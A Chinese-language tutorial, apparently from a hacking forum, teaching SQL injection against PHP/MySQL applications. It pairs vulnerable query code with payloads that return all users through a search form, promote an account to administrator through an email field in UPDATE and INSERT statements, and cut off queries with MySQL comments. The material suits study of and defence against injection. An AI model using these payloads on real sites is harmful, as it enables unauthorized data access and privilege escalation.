东西有点深``` 如果感兴趣大家可以认真的看看`` 其实也不是很难 但是要有一定的逻辑思维`` 可不要死学啊 那样是学不会的.... 好啦 开始啦

下面我们将从语法，注入点 and 注入类型几个方面来详细讲解mysql＋php注入 A:从MYSQL语法方面先 1。先讲一些mysql的基本语法，算是给没有好好学习的孩子补课了哦~_~ 1）select SELECT [STRAIGHT_JOIN] [SQL_SMALL_RESULT] select_expression,... [INTO {OUTFILE | DUMPFILE} `file_name` export_options] [FROM table_references [WHERE where_definition] [GROUP BY col_name,...] [ORDER BY {unsigned_integer | col_name | formula} [ASC | DESC] ,...] ] 常用的就是这些，select_expression指想要检索的列，后面我们可以用where来限制条件，我们也可以用into outfile将select结果输出到文件中。当然我们也可以用select直接输出 例如 mysql> select `a`; +---+ | a | +---+ | a | +---+ 1 row in set (0.00 sec) 具体内容请看mysql中文手册7.12节 下面说一些利用啦 看代码先 这段代码是用来搜索的哦 “> ……… SELECT * FROM users WHERE username LIKE ‘%$search%’ ORDER BY username ……. ?> 这里我们顺便说一下mysql中的通配符，’%’就是通配符，其它的通配符还有’*’和’_’,其中\" * \"用来匹配字段名，而\" % \"用来匹配字段值，注意的是%必须与like一起适用，还有一个通配符，就是下划线\" _ \"，它代表的意思和上面不同，是用来匹配任何单个的字符的。在上面的代码中我们用到了’*’表示返回的所有字段名，%$search%表示所有包含$search字符的内容。 我们如何注入哩？ 哈哈，和asp里很相似 在表单里提交 Aabb%’ or 1=1 order by id# 注：#在mysql中表示注释的意思，即让后面的sql语句不执行，后面将讲到。 或许有人会问为什么要用or 1＝1呢，看下面， 把提交的内容带入到sql语句中成为 SELECT * FROM users WHERE username LIKE ‘%aabb%’ or 1=1 order by id# ORDER BY username 假如没有含有aabb的用户名，那么or 1＝1使返回值仍为真，使能返回所有值 我们还可以这样 在表单里提交 %’ order by id# 或者 ’ order by id# 带入sql语句中成了 SELECT * FROM users WHERE username LIKE ‘% %’ order by id# ORDER BY username 和 SELECT * FROM users WHERE username LIKE ‘%%’ order by id# ORDER BY username 当然了，内容全部返回。 列出所有用户了哟，没准连密码都出来哩。 这里就举个例子先，下面会有更精妙的select语句出现，select实际上几乎是无处不在的哦！ 2)下面看update咯 Mysql中文手册里这么解释的： UPDATE [LOW_PRIORITY] tbl_name SET col_name1=expr1,col_name2=expr2,... [WHERE where_definition] UPDATE用新值更新现存表中行的列，SET子句指出哪个列要修改和他们应该被给定的值，WHERE子句，如果给出，指定哪个行应该被更新，否则所有行被更新。 详细内容去看mysql中文手册7.17节啦，在这里详细介绍的话会很罗嗦的哦。 由上可知update主要用于数据的更新，例如文章的修改，用户资料的修改，我们似乎更关心后者，因为...... 看代码先哦 我们先给出表的结构，这样大家看的明白 CREATE TABLE users ( id int(10) NOT NULL auto_increment, login varchar(25), password varchar(25), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) 其中userlevel表示等级，1为管理员，2为普通用户 //change.php …… $sql = \"UPDATE users SET password=`$pass`, email=`$email` WHERE id=`$id`\" …… ?> Ok，我们开始注入了哦，在添email的地方我们添入 netsh@163.com’,userlevel=’1 sql语句执行的就是 UPDATE users SET password=`youpass`, email=`netsh@163.com’,userlevel=’1’ WHERE id=`youid’ 看看我们的userlevel就是1了，变成管理员了哟 哈哈，如此之爽，简直是居家旅行必备啊。 这里我们简单提一下单引号闭合的问题，如果只用了一个单引号而没有单引号与之组成一对，系统会返回错误。列类型主要分为数字类型，日期和时间类型，字符串类型，然而引号一般用在字符串类型里，而在数字类型里一般人都不会用到引号（然而却是可以用的，而且威力很大），日期和时间类型就很少用于注入了（因为很少有提交时间变量的）。在下面我们会详细将这几种类型的注入方式哦！ 3)下面轮到insert了，它已经等的不耐烦了，简直就像中午食堂里的学生们。 Php中文手册是这样教我们的： INSERT [LOW_PRIORITY | DELAYED] [IGNORE] [INTO] tbl_name [(col_name,...)] VALUES (expression,...),(...),... INSERT把新行插入到一个存在的表中，INSERT ... VALUES形式的语句基于明确指定的值插入行，INSERT ... SELECT形式插入从其他表选择的行，有多个值表的INSERT ... VALUES的形式在MySQL 3.22.5或以后版本中支持，col_name=expression语法在MySQL 3.22.10或以后版本中支持。 由此可见对于见不到后台的我们来说，insert主要就出现在注册的地方，或者有其它提交的地方地方也可以哦。 看看表的结构先 CREATE TABLE membres ( id varchar(15) NOT NULL default ``, login varchar(25), password varchar(25), email varchar(30), userlevel tinyint, PRIMARY KEY (id) ) 我们仍然假设userlevel表示用户等级，1为管理者，2为普通用户哈。 代码如下 //reg.php …… $query = \"INSERT INTO members VALUES(`$id`,`$login`,`$pass`,`$email`,’2`)\" …… ?> 默认插入用户等级是2 现在我们构建注入语句了哦 还是在要我们输入email的地方输入： netsh@163.com’,’1’)# sql语句执行时变成了： INSERT INTO membres VALUES (`youid`,`youname`,`youpass`,` netsh@163.com’,’1’)#`,?`) 看我们一注册就是管理员了。 #号表示什么来着，不是忘了吧，晕了，这么快？ 忘就忘了吧，下面再详细给你说说 2.下面说一说mysql中的注释，这个是很重要的，大家可不能再睡觉啦，要是再睡觉到期末考试的时候就挂了你们。 我们继续 相信大家在上面的几个例子中已经看到注释的强大作用了吧，这里我们将再详细介绍一下。 Mysql有3种注释句法 # 注射掉注释符后面的本行内容 -- 注射效果同# /* ... */ 注释掉符号中间的部分 对于#号将是我们最常用的注释方法。 -- 号记得后面还得有一个空格才能起注释作用。 /*…*/ 我们一般只用前面的/*就够了，因为后面的我们想加也不行，是吧？ 注意：在浏览器地址栏输入#时应把它写成%23，这样经urlencode转换后才能成为#，从而起到注释的作用。#号在浏览器的地址框中输入的话可什么也不是哦。